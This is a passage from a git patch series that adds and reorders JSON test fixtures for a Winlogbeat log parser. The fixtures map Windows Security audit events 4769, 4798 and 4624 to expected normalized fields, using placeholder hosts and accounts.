l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}" + }, + "expected": { + "message": "{\"event\":{\"provider\":\"Microsoft-Windows-Security-Auditing\",\"original\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"code\":\"4769\",\"outcome\":\"success\",\"created\":\"2024-11-12T09:17:05.023Z\",\"action\":\"Op\u00e9rations de ticket du service Kerberos\",\"kind\":\"event\"},\"@timestamp\":\"2024-11-12T09:17:02.856Z\",\"ecs\":{\"version\":\"8.0.0\"},\"tags\":[\"forwarded\",\"beats_input_codec_plain_applied\"],\"log\":{\"level\":\"information\"},\"message\":\"Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\\n\\nInformations sur le compte :\\n\\tNom du compte :\\t\\taccount@DOMAIN.PRIV\\n\\tDomaine du compte :\\t\\tDOMAIN.PRIV\\n\\tGUID d\u2019ouverture de session :\\t\\t{12345678-ABCD-EF90-1234-123456ABCDEF}\\n\\nInformations sur le service :\\n\\tNom du service :\\t\\tSERVICE$\\n\\tID du service :\\t\\tS-1-2-3\\n\\nInformations sur le r\u00e9seau :\\n\\tAdresse du client :\\t\\t::ffff:1.2.3.4\\n\\tPort client :\\t\\t50754\\n\\nInformations suppl\u00e9mentaires :\\n\\tOptions du ticket :\\t\\t0x40810000\\n\\tType de chiffrement du ticket :\\t0x12\\n\\tCode d\u2019\u00e9chec :\\t\\t0x0\\n\\tServices en transit :\\t-\\n\\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\\n\\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\\n\\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.\",\"host\":{\"name\":\"HOST01.domain.priv\"},\"agent\":{\"name\":\"AGENT\",\"version\":\"8.11.1\",\"type\":\"winlogbeat\",\"ephemeral_id\":\"11111111-2222-3333-4444-555555555555\",\"id\":\"aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee\"},\"winlog\":{\"provider_guid\":\"{54849625-5478-4994-A5BA-3E3B0328C30D}\",\"channel\":\"Security\",\"task\":\"Op\u00e9rations de ticket du service Kerberos\",\"computer_name\":\"HOST01.domain.priv\",\"keywords\":[\"Succ\u00e8s de l\u2019audit\"],\"opcode\":\"Informations\",\"event_data\":{\"TicketEncryptionType\":\"0x12\",\"TicketOptions\":\"0x40810000\",\"LogonGuid\":\"{12345678-ABCD-EF90-1234-123456ABCDEF}\",\"IpPort\":\"50754\",\"TargetDomainName\":\"DOMAIN.PRIV\",\"TargetUserName\":\"account@DOMAIN.PRIV\",\"ServiceSid\":\"S-1-2-3\",\"Status\":\"0x0\",\"TransmittedServices\":\"-\",\"IpAddress\":\"::ffff:1.2.3.4\",\"ServiceName\":\"SERVICE$\"},\"process\":{\"thread\":{\"id\":7992},\"pid\":560},\"event_id\":\"4769\",\"api\":\"wineventlog\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"record_id\":2476587153},\"@version\":\"1\"}", + "event": { + "action": "Op\u00e9rations de ticket du service Kerberos", + "code": "4769", + "kind": "event", + "module": "security", + "original": "Un ticket de service Kerberos a \u00e9t\u00e9 demand\u00e9.\n\nInformations sur le compte :\n\tNom du compte :\t\taccount@DOMAIN.PRIV\n\tDomaine du compte :\t\tDOMAIN.PRIV\n\tGUID d\u2019ouverture de session :\t\t{12345678-ABCD-EF90-1234-123456ABCDEF}\n\nInformations sur le service :\n\tNom du service :\t\tSERVICE$\n\tID du service :\t\tS-1-2-3\n\nInformations sur le r\u00e9seau :\n\tAdresse du client :\t\t::ffff:1.2.3.4\n\tPort client :\t\t50754\n\nInformations suppl\u00e9mentaires :\n\tOptions du ticket :\t\t0x40810000\n\tType de chiffrement du ticket :\t0x12\n\tCode d\u2019\u00e9chec :\t\t0x0\n\tServices en transit :\t-\n\nC\u2019et \u00e9v\u00e9nement est g\u00e9n\u00e9r\u00e9 \u00e0 chaque fois qu\u2019un acc\u00e8s est demand\u00e9 \u00e0 une ressource comme un ordinateur ou un service Windows. Le nom du service indique la ressource \u00e0 laquelle l\u2019acc\u00e8s \u00e0 \u00e9t\u00e9 demand\u00e9.\n\nCet \u00e9v\u00e9nement peut \u00eatre associ\u00e9 \u00e0 des \u00e9v\u00e9nements de connexion Windows en comparant les champs GUID d\u2019ouverture de session de chaque \u00e9v\u00e9nement. L\u2019\u00e9v\u00e9nement de connexion se produit sur l\u2019ordinateur sur lequel l\u2019acc\u00e8s s\u2019est effectu\u00e9, qui souvent n\u2019est pas le m\u00eame ordinateur que le contr\u00f4leur de domaine qui a \u00e9mis le ticket de service.\n\nLes options de ticket, les types de chiffrement et les codes d\u2019\u00e9chec sont d\u00e9finis dans la RFC 4120.", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T09:17:02.856000Z", + "action": { + "id": 4769, + "outcome": "success", + "properties": { + "IpAddress": "::ffff:1.2.3.4", + "IpPort": "50754", + "LogonGuid": "{12345678-ABCD-EF90-1234-123456ABCDEF}", + "ServiceName": "SERVICE$", + "ServiceSid": "S-1-2-3", + "Status": "0x0", + "TargetDomainName": "DOMAIN.PRIV", + "TargetUserName": "account@DOMAIN.PRIV", + "TicketEncryptionType": "0x12", + "TicketOptions": "0x40810000", + "TransmittedServices": "-" + } + }, + "agent": { + "ephemeral_id": "11111111-2222-3333-4444-555555555555", + "id": "aaaaaaaa-bbbb-CCCC-DDDD-eeeeeeeeeeee", + "name": "AGENT", + "type": "winlogbeat", + "version": "8.11.1" + }, + "host": { + "name": "HOST01.domain.priv" + }, + "log": { + "level": "information" + }, + "related": { + "ip": [ + "::ffff:102:304" + ], + "user": [ + "account" + ] + }, + "service": { + "name": "SERVICE$" + }, + "source": { + "address": "::ffff:102:304", + "ip": "::ffff:102:304", + "port": 50754 + }, + "user": { + "domain": "DOMAIN.PRIV", + "name": "account", + "target": { + "domain": "DOMAIN.PRIV", + "name": "account@DOMAIN.PRIV" + } + }, + "winlog": { + "api": "wineventlog", + "channel": "Security", + "computer_name": "HOST01.domain.priv", + "event_data": { + "StatusDescription": "KDC_ERR_NONE" + }, + "event_id": "4769", + "keywords": [ + "Succ\u00e8s de l\u2019audit" + ], + "opcode": "Informations", + "process": { + "pid": 560, + "thread": { + "id": 7992 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "2476587153", + "task": "Op\u00e9rations de ticket du service Kerberos" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_4798.json b/Beats/winlogbeat/tests/security_event_4798.json new file mode 100644 index 000000000..b69049f3d --- /dev/null +++ b/Beats/winlogbeat/tests/security_event_4798.json @@ -0,0 +1,114 @@ +{ + "input": { + "sekoiaio": { + "intake": { + "dialect": "Elastic Winlogbeat", + "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" + } + }, + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}" + }, + "expected": { + "message": "{\"@timestamp\":\"2024-11-12T08:25:34.741Z\",\"event\":{\"action\":\"User Account Management\",\"outcome\":\"success\",\"provider\":\"Microsoft-Windows-Security-Auditing\",\"code\":\"4798\",\"created\":\"2024-11-12T08:25:35.614Z\",\"kind\":\"event\",\"dataset\":\"system.security\",\"original\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\"},\"message\":\"A user's local group membership was enumerated.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tACC0123$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nUser:\\n\\tSecurity ID:\\t\\tS-3-4-5\\n\\tAccount Name:\\t\\tGuest\\n\\tAccount Domain:\\t\\tACC0123\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x123\\n\\tProcess Name:\\t\\tC:\\\\Program Files\\\\program.exe\",\"elastic_agent\":{\"version\":\"8.14.1\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"snapshot\":false},\"log\":{\"level\":\"information\"},\"data_stream\":{\"type\":\"logs\",\"dataset\":\"system.security\",\"namespace\":\"windows\"},\"ecs\":{\"version\":\"8.0.0\"},\"winlog\":{\"activity_id\":\"{11111111-2222-3333-4444-555555555555}\",\"keywords\":[\"Audit Success\"],\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"channel\":\"Security\",\"task\":\"User Account Management\",\"process\":{\"pid\":668,\"thread\":{\"id\":8860}},\"event_data\":{\"TargetSid\":\"S-3-4-5\",\"TargetUserName\":\"Guest\",\"SubjectDomainName\":\"DOMAIN\",\"CallerProcessName\":\"C:\\\\Program Files\\\\program.exe\",\"SubjectUserName\":\"ACC0123$\",\"TargetDomainName\":\"ACC0123\",\"SubjectLogonId\":\"0x3e7\",\"SubjectUserSid\":\"S-1-2-3\",\"CallerProcessId\":\"0x123\"},\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"api\":\"wineventlog\",\"opcode\":\"Info\",\"computer_name\":\"ACC0123.johndoe.com\",\"record_id\":1524672,\"event_id\":\"4798\"},\"input\":{\"type\":\"winlog\"},\"@version\":\"1\",\"agent\":{\"version\":\"8.14.1\",\"type\":\"filebeat\",\"name\":\"ACC0123\",\"id\":\"aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee\",\"ephemeral_id\":\"12345678-90ab-cdef-1234-123456abcdef\"},\"tags\":[\"Windows\",\"beats_input_codec_plain_applied\"],\"host\":{\"hostname\":\"hostname\",\"architecture\":\"x86_64\",\"id\":\"12345678-90ef-abcd-1234-abcdef123456\",\"name\":\"hostname\",\"mac\":[\"00-11-22-33-44-55\"],\"os\":{\"kernel\":\"10.0.20348.169 (WinBuild.160101.0800)\",\"version\":\"10.0\",\"type\":\"windows\",\"name\":\"Windows Server 2022 Standard\",\"build\":\"20348.169\",\"family\":\"windows\",\"platform\":\"windows\"},\"ip\":[\"1.2.3.4\"]}}", + "event": { + "action": "User Account Management", + "code": "4798", + "kind": "event", + "module": "security", + "original": "A user's local group membership was enumerated.\n\nSubject:\n\tSecurity ID:\t\tS-1-2-3\n\tAccount Name:\t\tACC0123$\n\tAccount Domain:\t\tDOMAIN\n\tLogon ID:\t\t0x3E7\n\nUser:\n\tSecurity ID:\t\tS-3-4-5\n\tAccount Name:\t\tGuest\n\tAccount Domain:\t\tACC0123\n\nProcess Information:\n\tProcess ID:\t\t0x123\n\tProcess Name:\t\tC:\\Program Files\\program.exe", + "outcome": "success", + "provider": "Microsoft-Windows-Security-Auditing" + }, + "@timestamp": "2024-11-12T08:25:34.741000Z", + "action": { + "id": 4798, + "outcome": "success", + "properties": { + "CallerProcessId": "0x123", + "CallerProcessName": "C:\\Program Files\\program.exe", + "SubjectDomainName": "DOMAIN", + "SubjectLogonId": "0x3e7", + "SubjectUserName": "ACC0123$", + "SubjectUserSid": "S-1-2-3", + "TargetDomainName": "ACC0123", + "TargetSid": "S-3-4-5", + "TargetUserName": "Guest" + } + }, + "agent": { + "ephemeral_id": "12345678-90ab-cdef-1234-123456abcdef", + "id": "aaaaaaaa-bbbb-cccc-dddd-eeeeeeeeeeee", + "name": "ACC0123", + "type": "filebeat", + "version": "8.14.1" + }, + "host": { + "architecture": "x86_64", + "hostname": "hostname", + "id": "12345678-90ef-abcd-1234-abcdef123456", + "ip": [ + "1.2.3.4" + ], + "mac": [ + "00-11-22-33-44-55" + ], + "name": "hostname", + "os": { + "build": "20348.169", + "family": "windows", + "kernel": "10.0.20348.169 (WinBuild.160101.0800)", + "name": "Windows Server 2022 Standard", + "platform": "windows", + "type": "windows", + "version": "10.0" + } + }, + "log": { + "level": "information" + }, + "related": { + "hosts": [ + "hostname" + ], + "ip": [ + "1.2.3.4" + ], + "user": [ + "ACC0123" + ] + }, + "user": { + "domain": "DOMAIN", + "id": "S-1-2-3", + "name": "ACC0123", + "target": { + "domain": "ACC0123", + "name": "Guest" + } + }, + "winlog": { + "activity_id": "{11111111-2222-3333-4444-555555555555}", + "api": "wineventlog", + "channel": "Security", + "computer_name": "ACC0123.johndoe.com", + "event_id": "4798", + "keywords": [ + "Audit Success" + ], + "logon": { + "id": "0x3e7" + }, + "opcode": "Info", + "process": { + "pid": 668, + "thread": { + "id": 8860 + } + }, + "provider_guid": "{54849625-5478-4994-a5ba-3e3b0328c30d}", + "provider_name": "Microsoft-Windows-Security-Auditing", + "record_id": "1524672", + "task": "User Account Management" + } + } +} \ No newline at end of file diff --git a/Beats/winlogbeat/tests/security_event_5140.json b/Beats/winlogbeat/tests/security_event_5140.json index cde1d5c3c..8413484f9 100644 --- a/Beats/winlogbeat/tests/security_event_5140.json +++ b/Beats/winlogbeat/tests/security_event_5140.json @@ -93,11 +93,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "HOST01.company.test", - "event_data": { - "AccessMaskDescription": [ - "Create Child" - ] - }, "event_id": "5140", "keywords": [ "Audit Success" diff --git a/Beats/winlogbeat/tests/security_event_5145.json b/Beats/winlogbeat/tests/security_event_5145.json index 99a17d54f..ec1e78d54 100644 --- a/Beats/winlogbeat/tests/security_event_5145.json +++ b/Beats/winlogbeat/tests/security_event_5145.json @@ -96,13 +96,6 @@ "api": "wineventlog", "channel": "Security", "computer_name": "host01.company.test", - "event_data": { - "AccessMaskDescription": [ - "List Object", - "READ_CONTROL", - "SYNCHRONIZE" - ] - }, "event_id": "5145", "keywords": [ "Audit Success" From ce15f8192df09ce7a518c56479354e2ad1ffe28e Mon Sep 17 00:00:00 2001 From: LenaigKaliou Date: Thu, 14 Nov 2024 11:43:35 +0100 Subject: [PATCH 036/150] fixed linting issues --- Beats/winlogbeat/tests/security_event_4624.json | 4 ++-- Beats/winlogbeat/tests/security_event_4625.json | 4 ++-- Beats/winlogbeat/tests/security_event_4634.json | 4 ++-- Beats/winlogbeat/tests/security_event_4662.json | 4 ++-- Beats/winlogbeat/tests/security_event_4672.json | 4 ++-- Beats/winlogbeat/tests/security_event_4689.json | 4 ++-- Beats/winlogbeat/tests/security_event_4720.json | 4 ++-- Beats/winlogbeat/tests/security_event_4722.json | 4 ++-- Beats/winlogbeat/tests/security_event_4723.json | 4 ++-- Beats/winlogbeat/tests/security_event_4725.json | 4 ++-- Beats/winlogbeat/tests/security_event_4726.json | 4 ++-- Beats/winlogbeat/tests/security_event_4768.json | 4 ++-- Beats/winlogbeat/tests/security_event_4769.json | 4 ++-- Beats/winlogbeat/tests/security_event_4798.json | 4 ++-- 14 files changed, 28 insertions(+), 28 deletions(-) diff --git a/Beats/winlogbeat/tests/security_event_4624.json b/Beats/winlogbeat/tests/security_event_4624.json index 9e8cdfb26..fe8a200a5 100644 --- a/Beats/winlogbeat/tests/security_event_4624.json +++ b/Beats/winlogbeat/tests/security_event_4624.json @@ -1,12 +1,12 @@ { "input": { + "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon Information:\\n\\tLogon Type:\\t\\t3\\n\\tRestricted Admin Mode:\\t-\\n\\tVirtual Account:\\t\\tNo\\n\\tElevated Token:\\t\\tNo\\n\\nImpersonation Level:\\t\\tImpersonation\\n\\nNew Logon:\\n\\tSecurity ID:\\t\\tS-4-5-6\\n\\tAccount Name:\\t\\ttarget_user\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0xFCEBB74A\\n\\tLinked Logon ID:\\t\\t0x0\\n\\tNetwork Account Name:\\t-\\n\\tNetwork Account Domain:\\t-\\n\\tLogon GUID:\\t\\t{00000000-0000-0000-0000-000000000000}\\n\\nProcess Information:\\n\\tProcess ID:\\t\\t0x2f0\\n\\tProcess Name:\\t\\tC:\\\\Windows\\\\System32\\\\executable.exe\\n\\nNetwork Information:\\n\\tWorkstation Name:\\tWS-USER-01\\n\\tSource Network Address:\\t1.2.3.4\\n\\tSource Port:\\t\\t29051\\n\\nDetailed Authentication Information:\\n\\tLogon Process:\\t\\tProcess \\n\\tAuthentication Package:\\tMICROSOFT_AUTHENTICATION_PACKAGE_V1_0\\n\\tTransited Services:\\t-\\n\\tPackage Name (NTLM only):\\t-\\n\\tKey Length:\\t\\t0\\n\\nThis event is generated when a logon session is created. It is generated on the computer that was accessed.\\n\\nThe subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.\\n\\nThe logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).\\n\\nThe New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.\\n\\nThe network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.\\n\\nThe impersonation level field indicates the extent to which a process in the logon session can impersonate.\\n\\nThe authentication information fields provide detailed information about this specific logon request.\\n\\t- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.\\n\\t- Transited services indicate which intermediate services have participated in this logon request.\\n\\t- Package name indicates which sub-protocol was used among the NTLM protocols.\\n\\t- Key length indicates the length of the generated session key. This will be 0 if no session key was requested.\",\"@version\":\"1\",\"@timestamp\":\"2024-11-12T08:41:05.803Z\"}", "sekoiaio": { "intake": { "dialect": "Elastic Winlogbeat", "dialect_uuid": "c10307ea-5dd1-45c6-85aa-2a6a900df99b" } - }, - "message": "{\"agent\":{\"version\":\"7.0.0\",\"hostname\":\"hostname\",\"id\":\"abcd1234-abcd-1234-ef56-abcdef123456\",\"ephemeral_id\":\"12345678-1234-5678-9012-123456789012\",\"type\":\"winlogbeat\"},\"host\":{\"hostname\":\"hostname\",\"os\":{\"version\":\"10.0\",\"build\":\"17763.6414\",\"family\":\"windows\",\"kernel\":\"10.0.17763.6414 (WinBuild.160101.0800)\",\"platform\":\"windows\",\"name\":\"Windows Server 2019 Datacenter\"},\"id\":\"abcdefab-1234-5678-9012-abcdefabcdef\",\"name\":\"hostname\",\"architecture\":\"x86_64\"},\"type\":\"winlogbeat\",\"ecs\":{\"version\":\"1.0.0\"},\"event\":{\"created\":\"2024-11-12T08:41:07.164Z\",\"action\":\"Logon\",\"code\":4624,\"kind\":\"event\"},\"tags\":[\"beats_input_codec_plain_applied\"],\"winlog\":{\"keywords\":[\"Audit Success\"],\"api\":\"wineventlog\",\"version\":2,\"process\":{\"pid\":752,\"thread\":{\"id\":7960}},\"record_id\":1170100815,\"event_data\":{\"TargetLinkedLogonId\":\"0x0\",\"IpPort\":\"29051\",\"TargetOutboundUserName\":\"-\",\"ImpersonationLevel\":\"%%1833\",\"TargetDomainName\":\"DOMAIN\",\"TargetOutboundDomainName\":\"-\",\"IpAddress\":\"1.2.3.4\",\"LogonProcessName\":\"Process \",\"WorkstationName\":\"WS-USER-01\",\"LmPackageName\":\"-\",\"SubjectUserSid\":\"S-1-2-3\",\"ProcessId\":\"0x2f0\",\"VirtualAccount\":\"%%1843\",\"SubjectLogonId\":\"0x3e7\",\"KeyLength\":\"0\",\"RestrictedAdminMode\":\"-\",\"TargetUserSid\":\"S-4-5-6\",\"ElevatedToken\":\"%%1843\",\"SubjectUserName\":\"WS-USER-01$\",\"LogonGuid\":\"{00000000-0000-0000-0000-000000000000}\",\"TransmittedServices\":\"-\",\"LogonType\":\"3\",\"SubjectDomainName\":\"DOMAIN\",\"TargetUserName\":\"target_user\",\"ProcessName\":\"C:\\\\Windows\\\\System32\\\\executable.exe\",\"TargetLogonId\":\"0xfcebb74a\",\"AuthenticationPackageName\":\"MICROSOFT_AUTHENTICATION_PACKAGE_V1_0\"},\"event_id\":4624,\"computer_name\":\"hostname.company.com\",\"channel\":\"Security\",\"task\":\"Logon\",\"provider_name\":\"Microsoft-Windows-Security-Auditing\",\"provider_guid\":\"{54849625-5478-4994-a5ba-3e3b0328c30d}\",\"opcode\":\"Info\"},\"log\":{\"level\":\"information\"},\"message\":\"An account was successfully logged on.\\n\\nSubject:\\n\\tSecurity ID:\\t\\tS-1-2-3\\n\\tAccount Name:\\t\\tWS-USER-01$\\n\\tAccount Domain:\\t\\tDOMAIN\\n\\tLogon ID:\\t\\t0x3E7\\n\\nLogon 